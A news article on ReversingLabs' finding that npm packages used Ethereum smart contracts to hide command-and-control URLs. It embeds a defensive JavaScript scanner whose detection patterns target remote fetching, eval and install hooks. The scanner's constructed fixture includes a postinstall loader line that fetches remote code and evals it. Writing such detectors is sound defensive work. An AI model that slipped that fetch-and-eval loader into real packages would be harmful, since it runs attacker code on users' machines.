Hackers Exploit Ethereum Smart Contracts to Spread Malware, ReversingLabs Warns


Cybersecurity researchers have uncovered a tactic in which attackers use Ethereum smart contracts to conceal and distribute malware, allowing them to bypass traditional security scans.

Source report: "Ethereum smart contracts used to push malicious code on npm" (ReversingLabs), which describes how the contracts were abused and how the incident fits into a larger campaign promoting malicious packages on top repositories.

In a report this week, security firm ReversingLabs detailed how malicious actors are embedding obfuscated scripts within Node Package Manager (npm) libraries — a popular platform for JavaScript tools — to fetch hidden command-and-control (C2) server URLs via the Ethereum blockchain. Once installed, these packages can deliver secondary malware payloads onto compromised systems.

Malware hidden in npm packages

ReversingLabs identified two malicious npm packages, colortoolsv2 and mimelib2, first published in July. Although they appeared to be simple downloaders, the packages queried Ethereum smart contracts to retrieve attacker-controlled URLs. Those URLs led to C2 servers that pushed second-stage payloads capable of stealing data, installing remote access tools, or serving as footholds for broader attacks.
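The loader shape described above (code that talks to an Ethereum node, fetches whatever the chain points to, and executes it, typically from an install hook) can be triaged statically before a package is installed. The following is an added defender-side example, not code from ReversingLabs or from the packages discussed; the indicators, weights, thresholds and the fixture packages are all assumptions constructed for illustration.

```javascript
// Heuristic pre-install triage for npm packages that use the Ethereum blockchain
// as a pointer to a second stage. Indicators and weights are assumptions.
const INDICATORS = [
  { name: 'ethereum-rpc', weight: 3,
    re: /\beth_call\b|require\(['"](ethers|web3)['"]\)|from\s+['"](ethers|web3)['"]/ },
  { name: 'contract-address', weight: 1, re: /\b0x[0-9a-fA-F]{40}\b/ },
  { name: 'remote-fetch', weight: 1, re: /\b(fetch|axios(\.get)?|https?\.get)\s*\(/ },
  { name: 'dynamic-exec', weight: 3, re: /\beval\s*\(|new\s+Function\s*\(|child_process|vm\.runIn/ },
  { name: 'obfuscation', weight: 2, re: /(\\x[0-9a-fA-F]{2}){8,}|[A-Za-z0-9+/]{120,}={0,2}/ },
];
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];

// Returns the names of the indicators present in one source file.
function scanSource(src) {
  return INDICATORS.filter(i => i.re.test(src)).map(i => i.name);
}

// pkg = { packageJson: {...}, files: { 'index.js': 'source text', ... } }
function triagePackage(pkg) {
  const hits = new Set();
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) if (scripts[hook]) hits.add('lifecycle:' + hook);
  for (const src of Object.values(pkg.files || {})) scanSource(src).forEach(h => hits.add(h));
  let score = 0;
  for (const i of INDICATORS) if (hits.has(i.name)) score += i.weight;
  if ([...hits].some(h => h.startsWith('lifecycle:'))) score += 2;
  // The combination is the real signal: chain data used as a pointer to remote code.
  if (hits.has('ethereum-rpc') && hits.has('remote-fetch') && hits.has('dynamic-exec')) score += 4;
  const verdict = score >= 8 ? 'block' : score >= 3 ? 'review' : 'allow';
  return { score, verdict, hits: [...hits].sort() };
}

// Constructed fixtures (no real package code): a loader-shaped package and a benign one.
const SUSPECT = {
  packageJson: { name: 'constructed-suspect', scripts: { postinstall: 'node index.js' } },
  files: { 'index.js': [
    "const { ethers } = require('ethers');",
    "const contract = '0x' + '0'.repeat(40); // placeholder, not a real contract address",
    "fetch(nextStageUrl).then(r => r.text()).then(code => eval(code));",
  ].join('\n') },
};
const BENIGN = {
  packageJson: { name: 'constructed-benign', scripts: { test: 'node test.js' } },
  files: { 'index.js': "module.exports = { hex: v => v.toString(16).padStart(2, '0') };" },
};

console.log(triagePackage(SUSPECT), triagePackage(BENIGN));
```

The scoring rewards the combination of indicators rather than any one of them, since a wallet library or a `fetch` call alone is common in legitimate packages.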

The campaign is part of a growing trend in which open-source ecosystems such as npm and GitHub are exploited through deceptive project setups and social engineering. Developers who unknowingly integrate these malicious dependencies into real applications create supply chain risks for users downstream.

A broader evolution of threats

Supply chain attacks targeting developers have become increasingly sophisticated. Earlier this year, ReversingLabs flagged a trojanized npm package designed to scan systems for popular crypto wallets like Atomic and Exodus, silently redirecting funds to attacker addresses.

North Korea’s Lazarus Group has also been linked to npm-based attacks, while in 2024, security firm Slowmist reported a scam exploiting a malicious Ethereum RPC function to trick users of the imToken wallet.

What sets the latest campaign apart, ReversingLabs noted, is the use of Ethereum smart contracts not just for financial fraud, but as infrastructure to host URLs for malicious commands. This makes detection far more challenging, since the blockchain itself is being leveraged as a trusted intermediary.

Developer vigilance is key

ReversingLabs urged developers to remain vigilant when working with open-source libraries and third-party packages.

“It is critical for developers to assess each library,” the firm advised, emphasizing the need to scrutinize maintainers and project history rather than relying solely on download counts or commit activity.
